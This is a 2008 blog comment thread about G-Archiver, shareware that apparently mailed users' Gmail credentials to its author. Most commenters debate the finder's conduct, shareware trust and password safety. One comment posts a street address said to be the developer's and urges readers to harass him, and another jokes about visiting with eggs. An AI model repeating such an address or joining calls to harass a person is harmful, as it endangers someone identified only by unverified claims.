I don't think you were too quick or too harsh Dustin. I think you did exactly the right thing and as others have said I would have conntacted GMail and the FBI (since it's interstate fraud).
I don't think a wholesale abandoning of shareware is the answer. Nor is open source. While this may seem like a smoking gun for the case of open source let's not be so reactionary. There are many, many honest software developers that release their software as shareware to get their product on people's desktops.
You wouldn't say, "I stubbed my toe on the kitchen table so we must outlaw all tables... and toes."
Kaitain on March 10, 2008 7:47 AMI haven't ready all the posts, but I'll try to answer a few more questions.
Yes, I did kind of screw up by downloading some random software and I'll take the idiot card for that. I was essentially looking for something that would backup the gmail emails in their entirety. I use the labels almost religiously on everything in my box and wanted a way to keep those intact (which by the way Thunderbird will kind of do using IMAP, so yay).
Since this program wasn't going to cut it, I wanted to see how much code went into getting it this far in case I was going to be forced to try and write something myself. I've used Reflector on a lot of things, that doesn't mean I've stolen other peoples code, claimed it as my own, sold it on the black market and killed puppies as some people seem to think.
Oh, and a lot of the emails had been opened. And there is absolutely no reason to have a debug function to email the username and password of a gmail account, to another gmail account.
And to email all the affected accounts would mean getting each name individually off the body of the message. They were sent from jterry to jterry, so they weren't added to his contacts.
I used to live literally down the street from where this guy apparently lives. I might pay him a visit next time I go back home - me and a dozen eggs.
PaoloB on March 10, 2008 7:57 AMThe difference between a black-hat hacker and a hero is how they use their abilities and in this case IMHO our friend Dustin Brooks did do us a favor. The fact that he reverse-compiled the code is a white-hat tecnique in the hacking world. (Modifying it and then turning into a worm,etc would be a black-hat/script kiddie thing). Frankly its the curious sorts who have discovered things like the Sony Rootkit fiasco, etc. Don't blame DB because he DIDN'T think to lock out the account and then call google, he mitigated the threat and then called google. In security, mitigation comes first THEN investigation. Sometimes this means you lose your attacker/offendor but its better to be safe first. WE SHOULD Blame the bloody b@st@rd who wrote this crapola code and then posted it for public use! Frankly, I suspect it was a sub-contracted job and the person who did it decided to a few, er, liberties with his/her code.
Our personal information is everywhere and is easily accesible so DB's quick move was in our favor... Do yourselves a favour and do a zabasearch on your name. You might be shocked at what you find.
-S
PS This is not a plug for zabasearch, I just find the site fascinating.
PPS If I discover that someone has my personal information unecrypted in a spreadsheet, or a word doc, or a text file, or a hash file or in HTML or a file with a well known format, first I politely ask them to remove the information and then if I can go over their head if they do not comply. Its happened where I work (names and socials out in the open!) and I've seen it on websites (myspace, etc). We must be vigilant to protect our identities!
PPPS rotate your passwords everywhere, every 60 days.
You should submit that to thedailywtf.com
David on March 10, 2008 8:51 AMYou know, skimming the comments after getting here from Daring Fireball, I'm surprised nobody brought up this classic...
http://cm.bell-labs.com/who/ken/trust.html
Des Courtney on March 10, 2008 9:09 AMHey, how about blurring/mosaicing out the 10 or so gmail names that are in that screenshot?
Too late. They'll now get even more spam.
Man chowda on March 10, 2008 9:09 AM@Dustin:
In case you decide to delete John Terry's google account,
a href="http://www.google.com/support/accounts/bin/answer.py?hl=enanswer=32046"http://www.google.com/support/accounts/bin/answer.py?hl=enanswer=32046/a
Ryan,
Well, the jury's still out on whether you're an idiot, so no worries. :-D
Eric on March 10, 2008 9:47 AMExcellent work man, its good to have people like you around.
kefka on March 10, 2008 10:51 AMerm... are you familiar with the concept of "POP mail". when you can pop your gmail down for free.. why were you looking for an alternative to backup your emails???
Oh, very unpleasant.
GUmy on March 10, 2008 11:00 AMIt looks like G-archiver has been taken down from all of the shareware download sites, as well as the G-archiver website itself. Does anyone still have a link to the original executable? I would love to peruse the decompiled source code for myself.
DBrant on March 10, 2008 11:13 AMI find it odd that no one referenced this yet (though, admittedly I had to stop reading comments to this one eventually... great participation though). You can setup a trap in your gmail/yahoo/webmail accounts to make sure no one else is reading them. I can't take credit for this idea, but... I hope it helps.
http://www.makeuseof.com/tag/are-you-sure-your-email-isnt-being-hacked/
Basically, you create an irresistible named subject for an email, and send it to yourself like "Password list" and in it have either a link or html to load a hitcounter. Just keep the email in your box. Anyone trolling it will undoubtedly read it, and your hitcounter account registers a hit.
BTW- anyone using gmail chat or yahoo messenger, keep aware that your chat logs are also available, archived, on their servers. Apparently you can turn them off, but.. personally, after finding several passwords I sent to users in my own chatlogs, it's made me think twice about sending anything at all over the big provider networks, period.
Whitewlf on March 10, 2008 11:15 AMI agree with Domenic. DPAPI does not solve all problems. Is there a way the writer of this program could have used DPAPI? Wouldn't the installer at least need the password in plain text so that DPAPI could encrypt it specifically for the machine the software was installed on?
Marc on March 10, 2008 11:21 AMOpen source ftw?
Petras on March 10, 2008 11:50 AMThis is kinda of a catch 22, why would Dustin log into John's account without breaking some sort of ethics? If I was Dustin I would had done the same thing. But imagine if he logged into his email account and there was nothing?
Jesus DeLaTorre on March 10, 2008 11:59 AM-- We use Lutz as a verb. "Let's lutz it and find out"
I'm having that one David. Duly adopted.
I'm very skeptical of any third-party site or application that asks for username and password. These days access to your e-mail account gives a person access to your entire life.
Moral of the story: Trust No One.
Derek on March 10, 2008 12:14 PM What about working for a company like Raytheon, whose job is to
build better killing machines? Would you consider that ethically
defensible? That would seem to violate principles 1 and 2. Or, what
about working for an online gambling site? I'm just curious as to
where you would draw the line.
I think that at some point it has to come down to your own moral compass. I've worked in and around the defense industry my whole carreer. The thing is, the industry is about a whole lot more than just killing. For instance, I've done projects for NASA, which is about the most noble work I think a software engineer can be involved in. I've worked on flight simulators which keep pilots from *dying* from their mistakes while they are learning to fly. I've worked on shipboard engine controllers, which are what helps keep our sailors alive when the chips are down.
On the other hand, I have had two situations where I had to put my foot down. The first was a tank simulator for the Chineese army about 5 years after Tienamen. (Two ways I'm doing that: no way, and no f'n way!)
The second was a job offer I got for building smartbombs.
Not that I'm being judgemental here. I'm sure there are some people who could sit in a chair at the retirement home at the end of their carreer and be proud of a life spent building bombs. After all, a properly coded one probably causes less collateral damage and deaths than conventional bombs to produce the same effect. However, I am not one of those people.
T.E.D. on March 10, 2008 12:16 PMHere is where this douce bag lives:
10431 SW 88TH STREET SUITE D309, MIAMI FL 33176
Everyone send pizza and plumbers there.
TED on March 10, 2008 12:27 PMI think people are confusing that this is all work of Jeff because of few reasons:
1. The way Jeff puts ligh colored block and alignment in para-phrased is sometimes hard to notice. It is done nicely, but too nicely to differentiate.
2. Language Jeff used is burined between two para-phrases.
Personally I have found such entires quite confusing but appreciate that since I don't read all feeds, Jeff's is kind of digg to me, which helps me get such interesting content.
Ketan
Ketan on March 10, 2008 12:41 PMI blogged about this kind of behavior once before, but the *message* got lost. This is *exactly* the sort of thing I was talking about:
http://eddiesguy.blogspot.com/2007/08/heroes-villains-and-software.html
Mike Hofer on March 10, 2008 1:04 PMI tend to agree with what Dave said, was Jeff's action not taking the law into his own hands?
However on the other hand, Well done Jeff and writing this post. This type of programmer behaviou is criminal and leads to a total invasion of ones privicy.
As much as there are ethics and hopefull the majority of profesionals follow them, there is always the criminal mind. I am of the opinion that the industry should be more regulated and programmers held accountable for malicious code. I know this is an impossible ask, but would it not be nice?
Brett on March 10, 2008 1:49 PMKudos!
jp on March 10, 2008 1:54 PMJust for kicks I wanted to see if the PW was changed back or not, and noticed the password hint (as updated by Dustin)
"Why shouldn't I hard code my username and password into my software that sends me everyones personal information??"
LOL
Elijah on March 11, 2008 2:15 AMThe comments to this entry are closed.
Subscribe in a reader
Subscribe via email
|
|
Traffic Stats |